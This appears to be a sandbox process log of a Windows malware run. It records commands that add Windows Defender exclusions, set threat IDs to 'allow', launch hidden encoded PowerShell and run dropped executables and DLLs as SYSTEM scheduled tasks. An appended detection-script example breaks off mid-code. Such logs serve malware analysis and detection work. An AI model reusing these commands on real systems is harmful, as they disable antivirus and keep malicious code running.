"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\QqEAMUespgTHJnVz /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\QqEAMUespgTHJnVz /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gHUBkzNBz" /SC once /ST 00:06:14 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gHUBkzNBz"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "cmd" /tr "C:\ProgramData\cmd.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9fa3946f8,0x7ff9fa394708,0x7ff9fa394718
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "wrsa.exe opssvc.exe"
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gHUBkzNBz"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "ZTNkTKukmvvbOMPkn" /SC once /ST 05:18:14 /RU "SYSTEM" /TR "\"C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\fpNSkKK.exe\" 0c /PspKdidaZ 385118 /S" /V1 /F
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "ZTNkTKukmvvbOMPkn"
C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\fpNSkKK.exe
C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\fpNSkKK.exe 0c /PspKdidaZ 385118 /S
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 7664 -ip 7664
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7664 -s 688
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9fa3946f8,0x7ff9fa394708,0x7ff9fa394718
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "btZaCbGShXZoJDfvCg"
C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\hsUwQAlMU\xuHGDU.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "ucrVpivlTlXwlAC" /V1 /F
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\cmd.exe
cmd /c md 331913
C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "ucrVpivlTlXwlAC2" /F /xml "C:\Program Files (x86)\hsUwQAlMU\kJrbVKY.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "ucrVpivlTlXwlAC"
C:\Windows\SysWOW64\findstr.exe
findstr /V "EnquiryAnContributionRefers" Tank
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "ucrVpivlTlXwlAC"
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {c82192ee-6cb5-4bc0-9ef0-fb818773790a} -Embedding
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gXuMbmSriUtfuo" /F /xml "C:\Program Files (x86)\dlfHiRefefjU2\XgzpZcu.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "ZEKxHChbZmoqN2" /F /xml "C:\ProgramData\nivjmgppGaMJQQVB\ngAfYzJ.xml" /RU "SYSTEM"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9fe1d46f8,0x7ff9fe1d4708,0x7ff9fe1d4718
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "GJlNcuNKEmfKGuMTK2" /F /xml "C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR\WcNgtzj.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 5960 -ip 5960
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5960 -s 3168
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "jVeWQSRcqyudsTDYlcg2" /F /xml "C:\Program Files (x86)\QtKEgKYoTGTqC\wreHbsL.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "BjyVbWVaXyfCTlHuI" /SC once /ST 06:19:10 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\QqEAMUespgTHJnVz\fziOnKcf\eBOGRLS.dll\",#1 /kpdidI 385118" /V1 /F
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "BjyVbWVaXyfCTlHuI"
C:\Windows\system32\rundll32.EXE
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\QqEAMUespgTHJnVz\fziOnKcf\eBOGRLS.dll",#1 /kpdidI 385118
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\QqEAMUespgTHJnVz\fziOnKcf\eBOGRLS.dll",#1 /kpdidI 385118
C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy\vUpjdUek\jeyJgLg.exe
"C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy\vUpjdUek\jeyJgLg.exe" /S zs
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "BjyVbWVaXyfCTlHuI"
C:\Windows\SysWOW64\cmd.exe
cmd /c copy /b Ph + Shoot 331913\r
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\331913\Rent.pif
331913\Rent.pif 331913\r
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
C:\Windows\SysWOW64\PING.EXE
ping -n 5 127.0.0.1
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
C:\Users\Admin\Desktop\a\Newoff.exe
C:\Users\Admin\Desktop\a\Newoff.exe
C:\ProgramData\cmd.exe
C:\ProgramData\cmd.exe
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9fe1d46f8,0x7ff9fe1d4708,0x7ff9fe1d4718
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "btZaCbGShXZoJDfvCg" /SC once /ST 16:42:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy\vUpjdUek\jeyJgLg.exe\" PP /S" /V1 /F
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C schtasks /run /I /tn btZaCbGShXZoJDfvCg"
C:\Windows\SysWOW64\cmd.exe
/C schtasks /run /I /tn btZaCbGShXZoJDfvCg
\??\c:\windows\SysWOW64\schtasks.exe
schtasks /run /I /tn btZaCbGShXZoJDfvCg
C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy\vUpjdUek\jeyJgLg.exe
C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy\vUpjdUek\jeyJgLg.exe PP /S
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9fe1d46f8,0x7ff9fe1d4708,0x7ff9fe1d4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff9fe1d46f8,0x7ff9fe1d4708,0x7ff9fe1d4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9fe1d46f8,0x7ff9fe1d4708,0x7ff9fe1d4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9fe1d46f8,0x7ff9fe1d4708,0x7ff9fe1d4718
C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "wrsa.exe opssvc.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
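Detection logic over the command lines above, as an added example that is not part of this sandbox report or of any vendor tooling. The process list shows a recognisable pattern: tasklist piped into findstr to look for security products, forfiles used as an execution proxy (the child is launched under forfiles.exe rather than the dropper), reg add writing 6 (Allow) under Windows Defender\Threats\ThreatIDDefaultAction for specific threat IDs, WMIC adding an .exe extension exclusion via MSFT_MpPreference, and schtasks creating SYSTEM tasks whose action points at a user-writable path. The script below tags each of those patterns on a constructed sample of lines copied from the list; the rule names, the regexes and the sample are this example's own choices, not identifiers from the report.

```python
"""Command-line triage for a sandbox process list (added example)."""
import re
from collections import Counter

# Constructed sample: command lines copied from the process list above.
SAMPLE_CMDLINES = [
    r'tasklist',
    r'findstr /I "wrsa.exe opssvc.exe"',
    r'schtasks /CREATE /TN "ZTNkTKukmvvbOMPkn" /SC once /ST 05:18:14 /RU "SYSTEM" '
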